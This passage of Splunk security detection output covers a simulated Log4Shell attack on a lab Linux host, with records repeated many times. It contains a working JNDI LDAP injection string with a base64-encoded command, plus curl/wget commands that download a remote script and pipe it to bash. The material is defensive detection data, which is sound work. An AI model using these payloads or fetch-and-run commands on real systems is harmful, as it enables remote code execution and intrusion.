lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646654, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646651, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Exploitation", annotations._all="CIS 16", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="T1190", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646654, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646651, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Exploitation", annotations._all="CIS 16", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="T1190", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`. When executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
